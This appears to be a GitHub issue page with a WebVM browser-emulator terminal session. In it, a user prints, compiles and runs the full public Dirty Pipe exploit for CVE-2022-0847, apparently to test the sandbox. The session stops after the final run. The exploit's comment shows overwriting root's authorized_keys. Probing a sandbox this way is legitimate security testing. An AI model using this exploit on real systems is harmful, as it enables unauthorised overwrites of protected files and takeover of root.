You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
__ __ _ __ ____ __
\ \ / /__| |_\ \ / / \/ |
\ \/\/ / -_) '_ \ V /| |\/| |
\_/\_/\___|_.__/\_/ |_| |_|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
| |
| WebVM is a server-less virtual Linux environment running fully client-side |
| in HTML5/WebAssembly. |
| |
| In this demo, it runs an unmodified Debian distribution including many |
| native development toolchains. |
| |
| WebVM is powered by the CheerpX virtualization engine, and enables safe, |
| sandboxed client-side execution of x86 binaries on any browser. |
| |
| CheerpX includes an x86-to-WebAssembly JIT compiler, a virtual block-based |
| file system, and a Linux syscall emulator. |
| |
| For more information: https://medium.com/p/40a60170b361 |
| |
| GitHub | Issues | Gitter | Twitter | Latest News | About CheerpX |
| |
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
Welcome to WebVM (build 20220726). If unsure, try these examples:
python3 examples/python3/fibonacci.py
gcc -o helloworld examples/c/helloworld.c && ./helloworld
objdump -d ./helloworld | less -M
vim examples/c/helloworld.c
user@:~$ ls
examples test.c
user@:~$ cat test.c
/* SPDX-License-Identifier: GPL-2.0 */
/*
* Copyright 2022 CM4all GmbH / IONOS SE
*
* author: Max Kellermann <[email protected]>
*
* Proof-of-concept exploit for the Dirty Pipe
* vulnerability (CVE-2022-0847) caused by an uninitialized
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any
* file contents in the page cache, even if the file is not permitted
* to be written, immutable or on a read-only mount.
*
* This exploit requires Linux 5.8 or later; the code path was made
* reachable by commit f6dd975583bd ("pipe: merge
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
* there before, it just provided an easy way to exploit it.
*
* There are two major limitations of this exploit: the offset cannot
* be on a page boundary (it needs to write one byte before the offset
* to add a reference to this page to the pipe), and the write cannot
* cross a page boundary.
*
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
*
* Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];
/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}
/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}
/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}
int main(int argc, char **argv)
{
if (argc != 4) {
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
return EXIT_FAILURE;
}
/* dumb command-line argument parser */
const char *const path = argv[1];
loff_t offset = strtoul(argv[2], NULL, 0);
const char *const data = argv[3];
const size_t data_size = strlen(data);
if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}
const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}
/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}
struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}
if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}
if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}
/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);
/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}
/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}
printf("It worked!\n");
return EXIT_SUCCESS;
}
d
user@:~$ cat test.c | wc --help
Usage: wc [OPTION]... [FILE]...
or: wc [OPTION]... --files0-from=F
Print newline, word, and byte counts for each FILE, and a total line if
more than one FILE is specified. A word is a non-zero-length sequence of
characters delimited by white space.
With no FILE, or when FILE is -, read standard input.
The options below may be used to select which counts are printed, always in
the following order: newline, word, character, byte, maximum line length.
-c, --bytes print the byte counts
-m, --chars print the character counts
-l, --lines print the newline counts
--files0-from=F read input from the files specified by
NUL-terminated names in file F;
If F is - then read names from standard input
-L, --max-line-length print the maximum display width
-w, --words print the word counts
--help display this help and exit
--version output version information and exit
GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Report wc translation bugs to <https://translationproject.org/team/>
Full documentation at: <https://www.gnu.org/software/coreutils/wc>
or available locally via: info '(coreutils) wc invocation'
user@:~$ cat test.c | wc --lines
157
user@:~$ cat test.c | head -n 156
/* SPDX-License-Identifier: GPL-2.0 */
/*
* Copyright 2022 CM4all GmbH / IONOS SE
*
* author: Max Kellermann <[email protected]>
*
* Proof-of-concept exploit for the Dirty Pipe
* vulnerability (CVE-2022-0847) caused by an uninitialized
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any
* file contents in the page cache, even if the file is not permitted
* to be written, immutable or on a read-only mount.
*
* This exploit requires Linux 5.8 or later; the code path was made
* reachable by commit f6dd975583bd ("pipe: merge
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
* there before, it just provided an easy way to exploit it.
*
* There are two major limitations of this exploit: the offset cannot
* be on a page boundary (it needs to write one byte before the offset
* to add a reference to this page to the pipe), and the write cannot
* cross a page boundary.
*
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
*
* Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];
/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}
/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}
/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}
int main(int argc, char **argv)
{
if (argc != 4) {
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
return EXIT_FAILURE;
}
/* dumb command-line argument parser */
const char *const path = argv[1];
loff_t offset = strtoul(argv[2], NULL, 0);
const char *const data = argv[3];
const size_t data_size = strlen(data);
if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}
const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}
/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}
struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}
if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}
if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}
/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);
/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}
/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}
printf("It worked!\n");
return EXIT_SUCCESS;
}
user@:~$ cat test.c | head -n 156 > test2.c
user@:~$ cat test2.c
/* SPDX-License-Identifier: GPL-2.0 */
/*
* Copyright 2022 CM4all GmbH / IONOS SE
*
* author: Max Kellermann <[email protected]>
*
* Proof-of-concept exploit for the Dirty Pipe
* vulnerability (CVE-2022-0847) caused by an uninitialized
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any
* file contents in the page cache, even if the file is not permitted
* to be written, immutable or on a read-only mount.
*
* This exploit requires Linux 5.8 or later; the code path was made
* reachable by commit f6dd975583bd ("pipe: merge
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
* there before, it just provided an easy way to exploit it.
*
* There are two major limitations of this exploit: the offset cannot
* be on a page boundary (it needs to write one byte before the offset
* to add a reference to this page to the pipe), and the write cannot
* cross a page boundary.
*
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
*
* Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];
/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}
/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}
/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}
int main(int argc, char **argv)
{
if (argc != 4) {
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
return EXIT_FAILURE;
}
/* dumb command-line argument parser */
const char *const path = argv[1];
loff_t offset = strtoul(argv[2], NULL, 0);
const char *const data = argv[3];
const size_t data_size = strlen(data);
if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}
const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}
/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}
struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}
if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}
if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}
/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);
/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}
/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}
printf("It worked!\n");
return EXIT_SUCCESS;
}
user@:~$ gcc -Wall -Wextra test2.c
s
user@:~$
user@:~$ ls
a.out examples test.c test2.c
user@:~$ file a.out
a.out: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=11ad260aed4e48530daf8f81b93e156d5688f3dc, not stripped
user@:~$ ls
a.out examples test.c test2.c
user@:~$ ./a.out
Usage: ./a.out TARGETFILE OFFSET DATA
user@:~$ ls /etc/
adduser.conf deluser.conf ld.so.cache modules-load.d python3.7 shadow-
alternatives dhcp ld.so.conf motd rc0.d shells
apache2 dpkg ld.so.conf.d nanorc rc1.d skel
apt environment libaudit.conf network rc2.d ssl
bash.bashrc fstab lighttpd networks rc3.d subgid
bindresvport.blacklist gai.conf localtime nsswitch.conf rc4.d subgid-
binfmt.d group logcheck opt rc5.d subuid
ca-certificates group- login.defs os-release rc6.d subuid-
ca-certificates.conf gshadow logrotate.conf pam.conf rcS.d sysctl.conf
calendar gshadow- logrotate.d pam.d resolv.conf sysctl.d
cron.d host.conf machine-id passwd rmt systemd
cron.daily hostname magic passwd- rpc terminfo
cron.hourly hosts magic.mime perl rsyslog.conf timezone
cron.monthly init.d mailcap profile rsyslog.d tmpfiles.d
cron.weekly inputrc mailcap.order profile.d securetty udev
crontab iproute2 mime.types protocols security update-motd.d
debconf.conf issue mke2fs.conf python selinux vim
debian_version issue.net modprobe.d python2.7 services xattr.conf
default kernel modules python3 shadow xdg
user@:~$ ls /etc/
adduser.conf deluser.conf ld.so.cache modules-load.d python3.7 shadow-
alternatives dhcp ld.so.conf motd rc0.d shells
apache2 dpkg ld.so.conf.d nanorc rc1.d skel
apt environment libaudit.conf network rc2.d ssl
bash.bashrc fstab lighttpd networks rc3.d subgid
bindresvport.blacklist gai.conf localtime nsswitch.conf rc4.d subgid-
binfmt.d group logcheck opt rc5.d subuid
ca-certificates group- login.defs os-release rc6.d subuid-
ca-certificates.conf gshadow logrotate.conf pam.conf rcS.d sysctl.conf
calendar gshadow- logrotate.d pam.d resolv.conf sysctl.d
cron.d host.conf machine-id passwd rmt systemd
cron.daily hostname magic passwd- rpc terminfo
cron.hourly hosts magic.mime perl rsyslog.conf timezone
cron.monthly init.d mailcap profile rsyslog.d tmpfiles.d
cron.weekly inputrc mailcap.order profile.d securetty udev
crontab iproute2 mime.types protocols security update-motd.d
debconf.conf issue mke2fs.conf python selinux vim
debian_version issue.net modprobe.d python2.7 services xattr.conf
default kernel modules python3 shadow xdg
user@:~$ ls -a /etc/
Display all 115 possibilities? (y or n)
.pwd.lock gshadow- modules-load.d/ rmt
adduser.conf host.conf motd rpc
alternatives/ hostname nanorc rsyslog.conf
apache2/ hosts network/ rsyslog.d/
apt/ init.d/ networks securetty
bash.bashrc inputrc nsswitch.conf security/
bindresvport.blacklist iproute2/ opt/ selinux/
binfmt.d/ issue os-release services
ca-certificates/ issue.net pam.conf shadow
ca-certificates.conf kernel/ pam.d/ shadow-
calendar/ ld.so.cache passwd shells
cron.d/ ld.so.conf passwd- skel/
cron.daily/ ld.so.conf.d/ perl/ ssl/
cron.hourly/ libaudit.conf profile subgid
cron.monthly/ lighttpd/ profile.d/ subgid-
cron.weekly/ localtime protocols subuid
crontab logcheck/ python/ subuid-
debconf.conf login.defs python2.7/ sysctl.conf
debian_version logrotate.conf python3/ sysctl.d/
default/ logrotate.d/ python3.7/ systemd/
deluser.conf machine-id rc0.d/ terminfo/
dhcp/ magic rc1.d/ timezone
dpkg/ magic.mime rc2.d/ tmpfiles.d/
environment mailcap rc3.d/ udev/
fstab mailcap.order rc4.d/ update-motd.d/
gai.conf mime.types rc5.d/ vim/
group mke2fs.conf rc6.d/ xattr.conf
group- modprobe.d/ rcS.d/ xdg/
gshadow modules resolv.conf
user@:~$ ls -lah /etc/
total 0
-rw------- 0 user user 0 Sep 17 2021 .pwd.lock
-rw-r--r-- 0 user user 3.0K Sep 17 2021 adduser.conf
drwxr-xr-x 0 user user 4.0K Jan 31 2022 alternatives
drwxr-xr-x 0 user user 4.0K Sep 17 2021 apache2
drwxr-xr-x 0 user user 4.0K Sep 17 2021 apt
-rw-r--r-- 0 user user 2.0K Apr 18 2019 bash.bashrc
-rw-r--r-- 0 user user 367 Mar 2 2018 bindresvport.blacklist
drwxr-xr-x 0 user user 4.0K Mar 18 2021 binfmt.d
drwxr-xr-x 0 user user 4.0K Sep 17 2021 ca-certificates
-rw-r--r-- 0 user user 5.9K Sep 17 2021 ca-certificates.conf
drwxr-xr-x 0 user user 4.0K Sep 17 2021 calendar
drwxr-xr-x 0 user user 4.0K Sep 17 2021 cron.d
drwxr-xr-x 0 user user 4.0K Sep 17 2021 cron.daily
drwxr-xr-x 0 user user 4.0K Sep 17 2021 cron.hourly
drwxr-xr-x 0 user user 4.0K Sep 17 2021 cron.monthly
drwxr-xr-x 0 user user 4.0K Sep 17 2021 cron.weekly
-rw-r--r-- 0 user user 1.1K Oct 11 2019 crontab
-rw-r--r-- 0 user user 2.9K Feb 26 2019 debconf.conf
-rw-r--r-- 0 user user 6 Oct 3 2021 debian_version
drwxr-xr-x 0 user user 4.0K Sep 17 2021 default
-rw-r--r-- 0 user user 604 Jun 26 2016 deluser.conf
drwxr-xr-x 0 user user 4.0K Sep 17 2021 dhcp
drwxr-xr-x 0 user user 4.0K Sep 17 2021 dpkg
-rw-r--r-- 0 user user 0 Sep 17 2021 environment
-rw-r--r-- 0 user user 37 Sep 17 2021 fstab
-rw-r--r-- 0 user user 2.6K Aug 1 2018 gai.conf
-rw-r--r-- 0 user user 619 Sep 17 2021 group
-rw-r--r-- 0 user user 606 Sep 17 2021 group-
-rw-r----- 0 user user 516 Sep 17 2021 gshadow
-rw-r----- 0 user user 507 Sep 17 2021 gshadow-
-rw-r--r-- 0 user user 9 Aug 7 2006 host.conf
-rw-r--r-- 0 user user 7 Sep 17 2021 hostname
-rw-r--r-- 0 user user 109 Sep 17 2021 hosts
drwxr-xr-x 0 user user 4.0K Jan 28 2022 init.d
-rw-r--r-- 0 user user 1.8K May 5 2018 inputrc
drwxr-xr-x 0 user user 4.0K Sep 17 2021 iproute2
-rw-r--r-- 0 user user 27 Jun 13 2021 issue
-rw-r--r-- 0 user user 20 Jun 13 2021 issue.net
drwxr-xr-x 0 user user 4.0K Sep 17 2021 kernel
-rw-r--r-- 0 user user 19K Jan 31 2022 ld.so.cache
-rw-r--r-- 0 user user 34 Mar 2 2018 ld.so.conf
drwxr-xr-x 0 user user 4.0K Jan 28 2022 ld.so.conf.d
-rw-r--r-- 0 user user 191 Apr 25 2019 libaudit.conf
drwxr-xr-x 0 user user 4.0K Sep 17 2021 lighttpd
lrwxrwxrwx 0 user user 27 Jan 28 2022 localtime -> /usr/share/zoneinfo/Etc/UTC
drwxr-xr-x 0 user user 4.0K Sep 17 2021 logcheck
-rw-r--r-- 0 user user 11K Jul 27 2018 login.defs
-rw-r--r-- 0 user user 435 Aug 22 2018 logrotate.conf
drwxr-xr-x 0 user user 4.0K Sep 17 2021 logrotate.d
-r--r--r-- 0 user user 33 Sep 17 2021 machine-id
-rw-r--r-- 0 user user 111 Jan 25 2021 magic
-rw-r--r-- 0 user user 111 Jan 25 2021 magic.mime
-rw-r--r-- 0 user user 2.6K Jan 28 2022 mailcap
-rw-r--r-- 0 user user 449 Feb 9 2019 mailcap.order
-rw-r--r-- 0 user user 24K Feb 9 2019 mime.types
-rw-r--r-- 0 user user 812 Jan 10 2020 mke2fs.conf
drwxr-xr-x 0 user user 4.0K Feb 9 2019 modprobe.d
-rw-r--r-- 0 user user 195 Sep 17 2021 modules
drwxr-xr-x 0 user user 4.0K Jan 28 2022 modules-load.d
-rw-r--r-- 0 user user 286 Jun 13 2021 motd
-rw-r--r-- 0 user user 9.1K Jun 12 2019 nanorc
drwxr-xr-x 0 user user 4.0K Sep 17 2021 network
-rw-r--r-- 0 user user 60 Sep 17 2021 networks
-rw-r--r-- 0 user user 494 Feb 10 2019 nsswitch.conf
drwxr-xr-x 0 user user 4.0K Sep 17 2021 opt
lrwxrwxrwx 0 user user 21 Oct 3 2021 os-release -> ../usr/lib/os-release
-rw-r--r-- 0 user user 552 Feb 14 2019 pam.conf
drwxr-xr-x 0 user user 4.0K Jan 28 2022 pam.d
-rw-r--r-- 0 user user 1.2K Sep 17 2021 passwd
-rw-r--r-- 0 user user 1.2K Sep 17 2021 passwd-
drwxr-xr-x 0 user user 4.0K Jan 31 2022 perl
-rw-r--r-- 0 user user 767 Mar 4 2016 profile
drwxr-xr-x 0 user user 4.0K Jun 13 2021 profile.d
-rw-r--r-- 0 user user 2.9K Feb 10 2019 protocols
drwxr-xr-x 0 user user 4.0K Jan 28 2022 python
drwxr-xr-x 0 user user 4.0K Jan 28 2022 python2.7
drwxr-xr-x 0 user user 4.0K Sep 17 2021 python3
drwxr-xr-x 0 user user 4.0K Sep 17 2021 python3.7
drwxr-xr-x 0 user user 4.0K Sep 17 2021 rc0.d
drwxr-xr-x 0 user user 4.0K Sep 17 2021 rc1.d
drwxr-xr-x 0 user user 4.0K Jan 28 2022 rc2.d
drwxr-xr-x 0 user user 4.0K Jan 28 2022 rc3.d
drwxr-xr-x 0 user user 4.0K Jan 28 2022 rc4.d
drwxr-xr-x 0 user user 4.0K Jan 28 2022 rc5.d
drwxr-xr-x 0 user user 4.0K Sep 17 2021 rc6.d
drwxr-xr-x 0 user user 4.0K Sep 17 2021 rcS.d
-rw-r--r-- 0 user user 738 Sep 17 2021 resolv.conf
lrwxrwxrwx 0 user user 13 Apr 23 2019 rmt -> /usr/sbin/rmt
-rw-r--r-- 0 user user 887 Feb 10 2019 rpc
-rw-r--r-- 0 user user 2.0K Feb 26 2019 rsyslog.conf
drwxr-xr-x 0 user user 4.0K Feb 26 2019 rsyslog.d
-rw-r--r-- 0 user user 4.1K Jul 27 2018 securetty
drwxr-xr-x 0 user user 4.0K Sep 17 2021 security
drwxr-xr-x 0 user user 4.0K Sep 17 2021 selinux
-rw-r--r-- 0 user user 19K Feb 10 2019 services
-rw-r----- 0 user user 639 Sep 17 2021 shadow
-rw-r----- 0 user user 613 Sep 17 2021 shadow-
-rw-r--r-- 0 user user 116 Sep 17 2021 shells
drwxr-xr-x 0 user user 4.0K Sep 17 2021 skel
drwxr-xr-x 0 user user 4.0K Jan 28 2022 ssl
-rw-r--r-- 0 user user 18 Sep 17 2021 subgid
-rw-r--r-- 0 user user 0 Sep 17 2021 subgid-
-rw-r--r-- 0 user user 18 Sep 17 2021 subuid
-rw-r--r-- 0 user user 0 Sep 17 2021 subuid-
-rw-r--r-- 0 user user 2.3K May 31 2018 sysctl.conf
drwxr-xr-x 0 user user 4.0K Jan 28 2022 sysctl.d
drwxr-xr-x 0 user user 4.0K Jan 28 2022 systemd
drwxr-xr-x 0 user user 4.0K Sep 17 2021 terminfo
-rw-r--r-- 0 user user 8 Jan 28 2022 timezone
drwxr-xr-x 0 user user 4.0K Mar 18 2021 tmpfiles.d
drwxr-xr-x 0 user user 4.0K Jan 28 2022 udev
drwxr-xr-x 0 user user 4.0K Jan 28 2022 update-motd.d
drwxr-xr-x 0 user user 4.0K Sep 17 2021 vim
-rw-r--r-- 0 user user 642 Mar 1 2019 xattr.conf
drwxr-xr-x 0 user user 4.0K Jan 28 2022 xdg
user@:~$ find /usr -uid 0
user@:~$ ls
a.out examples test.c test2.c
user@:~$ echo abc>n
user@:~$ ./a.out
Usage: ./a.out TARGETFILE OFFSET DATA
user@:~$ ./a.out abc 1 d
open failed: No such file or directory
user@:~$ ./a.out n 1 d
The text was updated successfully, but these errors were encountered:
Console log:
Terminal output:
The text was updated successfully, but these errors were encountered: